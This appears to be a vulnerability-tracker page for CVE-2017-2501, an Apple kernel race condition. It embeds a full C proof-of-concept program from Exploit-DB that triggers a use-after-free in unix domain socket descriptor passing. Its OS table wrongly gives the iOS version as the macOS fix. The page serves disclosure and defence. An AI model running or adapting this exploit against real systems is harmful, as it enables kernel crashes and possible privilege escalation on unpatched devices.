CVE-2017-2501
high
CVSS v3
7.0
CVSS v4 NEW
โ
VIR risk
8.0
Description
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. macOS before 10.12.5 is affected. tvOS before 10.2.1 is affected. watchOS before 3.2.2 is affected. The issue involves the "Kernel" component. A race condition allows attackers to execute arbitrary code in a privileged context via a crafted app.
Predictions
Exploit likelihood
69%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Apple macOS/iOS Kernel - Use-After-Free Due to Bad Locking in Unix Domain Socket File Descriptor Externalization
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1123
unp_externalize is responsible for externalizing the file descriptors carried within a unix domain socket message.
That means allocating new fd table entries in the receiver and recreating a file which looks looks (to userspace) like the file
the sender sent.
Here's the relevant code:
for (i = 0; i < newfds; i++) { <----------- (a)
#if CONFIG_MACF_SOCKET
/*
* If receive access is denied, don't pass along
* and error message, just discard the descriptor.
*/
if (mac_file_check_receive(kauth_cred_get(), rp[i])) {
proc_fdunlock(p);
unp_discard(rp[i], p);
fds[i] = 0;
proc_fdlock(p);
continue;
}
#endif
if (fdalloc(p, 0, &f))
panic("unp_externalize:fdalloc");
fp = fileproc_alloc_init(NULL);
if (fp == NULL)
panic("unp_externalize: MALLOC_ZONE");
fp->f_iocount = 0;
fp->f_fglob = rp[i];
if (fg_removeuipc_mark(rp[i]))
fgl[i] = rp[i];
else
fgl[i] = NULL;
procfdtbl_releasefd(p, f, fp);
fds[i] = f;
}
proc_fdunlock(p); <-------- (b)
for (i = 0; i < newfds; i++) {
if (fgl[i] != NULL) {
VERIFY(fgl[i]->fg_lflags & FG_RMMSGQ);
fg_removeuipc(fgl[i]); <--------- (c)
}
if (fds[i])
(void) OSAddAtomic(-1, &unp_rights);
}
The loop at a gets the fileglobs from the socket message buffer and allocates new fds in the receiver
and sets the fp->f_fglob fileglob pointer to point to the sent fg. After each new fd is allocated and initialized
the fd is released and associated with the new fp.
At (b) the code then drops the process fd lock at which point other threads can access the fd table again.
At (c) the code then removes each of the fileglobs from the list of in-transit fileglobs; however this list *doesn't*
hold an fg reference therefore there's nothing stopping the fg from getting free'd via another thread closing
the fd between (b) and (c).
Use zone poisoning for a reliable crasher.
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
*/
//ianbeer
//the ReadDescriptor and Write Descriptor functions are based on Apple sample code from: https://developer.apple.com/library/content/qa/qa1541/_index.html
#if 0
iOS/MacOS kernel uaf due to bad locking in unix domain socket file descriptor externalization
unp_externalize is responsible for externalizing the file descriptors carried within a unix domain socket message.
That means allocating new fd table entries in the receiver and recreating a file which looks looks (to userspace) like the file
the sender sent.
Here's the relevant code:
for (i = 0; i < newfds; i++) { <----------- (a)
#if CONFIG_MACF_SOCKET
/*
* If receive access is denied, don't pass along
* and error message, just discard the descriptor.
*/
if (mac_file_check_receive(kauth_cred_get(), rp[i])) {
proc_fdunlock(p);
unp_discard(rp[i], p);
fds[i] = 0;
proc_fdlock(p);
continue;
}
#endif
if (fdalloc(p, 0, &f))
panic("unp_externalize:fdalloc");
fp = fileproc_alloc_init(NULL);
if (fp == NULL)
panic("unp_externalize: MALLOC_ZONE");
fp->f_iocount = 0;
fp->f_fglob = rp[i];
if (fg_removeuipc_mark(rp[i]))
fgl[i] = rp[i];
else
fgl[i] = NULL;
procfdtbl_releasefd(p, f, fp);
fds[i] = f;
}
proc_fdunlock(p); <-------- (b)
for (i = 0; i < newfds; i++) {
if (fgl[i] != NULL) {
VERIFY(fgl[i]->fg_lflags & FG_RMMSGQ);
fg_removeuipc(fgl[i]); <--------- (c)
}
if (fds[i])
(void) OSAddAtomic(-1, &unp_rights);
}
The loop at a gets the fileglobs from the socket message buffer and allocates new fds in the receiver
and sets the fp->f_fglob fileglob pointer to point to the sent fg. After each new fd is allocated and initialized
the fd is released and associated with the new fp.
At (b) the code then drops the process fd lock at which point other threads can access the fd table again.
At (c) the code then removes each of the fileglobs from the list of in-transit fileglobs; however this list *doesn't*
hold an fg reference therefore there's nothing stopping the fg from getting free'd via another thread closing
the fd between (b) and (c).
Use zone poisoning for a reliable crasher.
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
#endif
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/uio.h>
#include <sys/socket.h>
#include <errno.h>
#include <assert.h>
#include <pthread.h>
static const char kDummyData = 'D';
static int ReadDescriptor(int fd, int *fdRead)
// Read a descriptor from fd and place it in *fdRead.
//
// On success, the caller is responsible for closing *fdRead.
{
int err;
int junk;
struct msghdr msg;
struct iovec iov;
struct {
struct cmsghdr hdr;
int fd;
} control;
char dummyData;
ssize_t bytesReceived;
// Pre-conditions
assert(fd >= 0);
assert( fdRead != NULL);
assert(*fdRead == -1);
// Read a single byte of data from the socket, with the assumption
// that this byte has piggybacked on to it a single descriptor that
// we're trying to receive. This is pretty much standard boilerplate
// code for reading descriptors; see <x-man-page://2/recv> for details.
iov.iov_base = (char *) &dummyData;
iov.iov_len = sizeof(dummyData);
msg.msg_name = NULL;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = &control;
msg.msg_controllen = sizeof(control);
msg.msg_flags = MSG_WAITALL;
do {
bytesReceived = recvmsg(fd, &msg, 0);
if (bytesReceived == sizeof(dummyData)) {
if ( (dummyData != kDummyData)
|| (msg.msg_flags != 0)
|| (msg.msg_control == NULL)
|| (msg.msg_controllen != sizeof(control))
|| (control.hdr.cmsg_len != sizeof(control))
|| (control.hdr.cmsg_level != SOL_SOCKET)
|| (control.hdr.cmsg_type != SCM_RIGHTS)
|| (control.fd < 0) ) {
err = EINVAL;
} else {
*fdRead = control.fd;
err = 0;
}
} else if (bytesReceived == 0) {
err = EPIPE;
} else {
assert(bytesReceived == -1);
err = errno;
assert(err != 0);
}
} while (err == EINTR);
assert( (err == 0) == (*fdRead >= 0) );
return err;
}
static int WriteDescriptor(int fd, int fdToWrite)
// Write the descriptor fdToWrite to fd.
{
int err;
struct msghdr msg;
struct iovec iov;
struct {
struct cmsghdr hdr;
int fd;
} control;
ssize_t bytesSent;
char ack;
// Pre-conditions
assert(fd >= 0);
assert(fdToWrite >= 0);
control.hdr.cmsg_len = sizeof(control);
control.hdr.cmsg_level = SOL_SOCKET;
control.hdr.cmsg_type = SCM_RIGHTS;
control.fd = fdToWrite;
iov.iov_base = (char *) &kDummyData;
iov.iov_len = sizeof(kDummyData);
msg.msg_name = NULL;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = &control;
msg.msg_controllen = control.hdr.cmsg_len;
msg.msg_flags = 0;
do {
bytesSent = sendmsg(fd, &msg, 0);
if (bytesSent == sizeof(kDummyData)) {
err = 0;
} else {
assert(bytesSent == -1);
err = errno;
assert(err != 0);
}
} while (err == EINTR);
return err;
}
char* filenames[10] = {"a", "b", "c", "d", "e", "f", "g", "h", "i", "j"};
void parent(int sock) {
int f = 0;
while(1) {
char* filename = filenames[f];
f++;
f %= 10;
int to_send = open(filename, O_CREAT|O_RDWR, 0644);
int err = WriteDescriptor(sock, to_send);
printf("err: %x\n", err);
close(to_send);
}
}
void* child_thread(void* arg) {
while(1) {
close(3);
}
}
void child(int sock) {
for (int i = 0; i < 10; i++) {
pthread_t t;
pthread_create(&t, NULL, child_thread, NULL);
}
while (1) {
int received = -1;
int err = ReadDescriptor(sock, &received);
close(received);
}
}
int main() {
int socks[2];
socketpair(PF_LOCAL, SOCK_STREAM, 0, socks);
pid_t pid = fork();
if (pid != 0) {
close(socks[1]);
parent(socks[0]);
int wl;
waitpid(pid, &wl, 0);
exit(EXIT_SUCCESS);
} else {
close(socks[0]);
child(socks[1]);
exit(EXIT_SUCCESS);
}
return 0;
}OS impact
macOS Affected 1 release
| Version | Status | Fixed in |
|---|---|---|
| โ | Affected | 10.3.2 |
References
- http://www.securityfocus.com/bid/98468
- http://www.securitytracker.com/id/1038484
- https://support.apple.com/HT207797
- https://support.apple.com/HT207798
- https://support.apple.com/HT207800
- https://support.apple.com/HT207801
- https://www.exploit-db.com/exploits/42054/
- http://www.securityfocus.com/bid/98468
- http://www.securitytracker.com/id/1038484
- https://support.apple.com/HT207797
- https://support.apple.com/HT207798
- https://support.apple.com/HT207800
- https://support.apple.com/HT207801
- https://www.exploit-db.com/exploits/42054/
CWEs
CWE-362
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.